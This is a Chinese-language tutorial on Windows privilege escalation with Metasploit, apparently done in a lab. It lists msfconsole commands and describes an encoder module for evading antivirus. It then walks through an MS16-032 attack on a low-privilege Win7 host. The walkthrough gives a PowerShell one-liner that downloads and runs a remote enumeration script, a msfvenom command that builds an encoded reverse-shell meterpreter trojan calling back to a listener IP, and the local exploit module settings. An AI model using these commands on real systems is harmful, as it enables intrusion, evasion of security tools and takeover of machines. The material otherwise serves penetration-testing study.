一、MSF提权
Metasploit是一个漏洞利用框架,简称msf。默认情况kail直接封装msf任工具。
msf-般会有四种接口对外提供, msfconsole、 msfc、 msfgui以及 msfet,我们主要以 msfconsole来做讲解与演示。
1.msfconsole 基本使用命令
启动: msfconsole
使用指南:help
基础命令
search ms17 #查找
use exploit/multi/handler #使用
info #查看信息
show exploits/payloads/options #显示可用信息
set options/payload #给相关对象赋值
exploit/run #执行
exploit #后台运行
back #返回上一级
sessions -i #查看当前可用会话
sessions -K #杀死所有活跃会话
2.模块
exploit
利用程序,针对漏洞、权限进行利用,是主要使用的模块
payload
用于在目标系统中运行任意命令或者执行特定代码,主要用于shell获取
auxiliary
该模块包含了扫描、嗅探、指纹识别、网络协议欺骗等相关功能模块
encode
r该模块主要针对 exploit模块进行代码免杀,以逃过杀毒软件、防火墙、ids等安全防护机制的检测
3.实战 ms16-032提权
1.查看当前权限、版本、ip等,发现是一个win7专业权限很低的用户
2.远程加载sherlock查看当前版本漏洞信息并导入一个1.txt文件中
powershell -nop -exec -bypass -c "IEX (New-Object Net.Webclient).DownloadString('http://192.168.10.100/Sherlock.ps1'); Find-Allvulns" >1.txt
powershell -nop -exec -bypass -c "Import-Module Sherlock.ps1; Find-Allvulns" >1.txt
执行完成并返回一个1.txt,查看漏洞信息
发现版本是64位的暂不支持漏洞
3.我们使用msf做一个木马程序
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.119.130 LPORT=4444 -f exe > 1.exe
参数说明:
- -p payload
- -e 编码方式
- -i 编码次数
- -b 在生成的程序中避免出现的值
- LHOST,LPORT 监听上线的主机IP和端口
- -f exe 生成EXE格式
设置本地监听
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
上传之靶机web 运行 这里我们 ip 端口4443 设置错了 重新改一下 192.168.119.130:4443
前面的 exe文件也要重新生成
执行
查看一下权限 没问题版本权限很低
还是使用sherlock 查看 漏洞
powershell -exec -bypass -c "sherlock.ps1; Find-Allvulns" >2.txt
选择一个当前版本的漏洞使用
这里演示MS16_032的漏洞
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
设置payload session LHOST LPORT
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set payload windows/meterpreter/reverse_tcp
运行即可获得shell